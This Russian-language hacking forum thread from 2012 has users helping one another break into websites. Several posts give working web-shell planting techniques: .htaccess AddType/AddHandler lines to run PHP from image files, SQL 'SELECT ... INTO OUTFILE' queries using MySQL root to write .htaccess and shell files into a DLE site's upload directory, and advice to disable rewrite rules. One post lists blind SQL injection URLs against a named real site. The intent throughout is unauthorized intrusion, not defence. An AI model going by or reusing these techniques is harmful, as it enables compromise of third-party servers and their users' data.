HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.04.2012, 11:18
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от mix0x0  
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?)
Это DOM BASED
 
Ответить с цитированием

  #2  
Старый 25.04.2012, 17:20
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами: 7725206

Репутация: 26
По умолчанию

пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка:

Цитата:
Сообщение от None  
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, postmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым

Цитата:
Сообщение от None  
AddType application/x-httpd-php .png
AddHandler application/x-httpd-php .png
но при попытки открыть shell.png он просто скачивается.

вообщем я хз что делать...
 
Ответить с цитированием

  #3  
Старый 25.04.2012, 17:54
HeaVeNSeR
Новичок
Регистрация: 03.12.2008
Сообщений: 5
С нами: 9176819

Репутация: 1
По умолчанию

ребят,подскажите,плз...в какую сторону копать?)...

сканнер показывает blind-sql здесь в параметре mna :

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=-89

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=89

здесь ошибка с раскрытием путей:

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray=male&srch=y&srchsexarray=1

можно ли раскрутить это скулю или это ошибка сканнера?
 
Ответить с цитированием

  #4  
Старый 25.04.2012, 19:56
Марок
Новичок
Регистрация: 22.04.2012
Сообщений: 28
С нами: 7398326

Репутация: 0
По умолчанию

мел кто дело с SFTcms v 2.0?

Картинки заливаются, но куда, черт ногу сломит =/
 
Ответить с цитированием

  #5  
Старый 25.04.2012, 20:24
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Марок  
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/
А посмотреть уже залитые картинке не?
 
Ответить с цитированием

  #6  
Старый 26.04.2012, 00:52
красавец
Новичок
Регистрация: 26.01.2012
Сообщений: 14
С нами: 7523606

Репутация: 5
По умолчанию

подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5

я делаю по 2 запроса одного типа

первый

Цитата:
Сообщение от None  
select 'php_flag engine on
\r
AddType application/x-httpd-php .phtml .jpg .html
\r
AddHandler application/x-httpd-php .phtml .jpg .html' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/.htaccess'
и второй сам шелл

Цитата:
Сообщение от None  
select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.jpg'
оба запроса в одну папку разумеется

всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..

Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет



Что ещё можно залить вместо моего htaccess ?
 
Ответить с цитированием

  #7  
Старый 26.04.2012, 00:58
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от красавец  
Что ещё можно залить вместо моего htaccess ?
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
 
Ответить с цитированием

  #8  
Старый 26.04.2012, 01:09
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию

Цитата:
Сообщение от красавец  
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере,
CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
и второй сам шелл
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже
Internal Server Error
кажет


Что ещё можно залить вместо моего htaccess ?

Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно)

Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.php'
 
Ответить с цитированием

  #9  
Старый 26.04.2012, 01:11
красавец
Новичок
Регистрация: 26.01.2012
Сообщений: 14
С нами: 7523606

Репутация: 5
По умолчанию

Цитата:
Сообщение от d1v  
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
мешает то что php не открывается просто так

я пытался разумеется сначало php залить
 
Ответить с цитированием

  #10  
Старый 26.04.2012, 01:19
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от красавец  
мешает то что php не открывается просто так
я пытался разумеется сначало php залить
ну попробуй в папку залить хтакес:

Цитата:
Сообщение от None  
RewriteEngine Off
и патом в пхп записаться уже.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.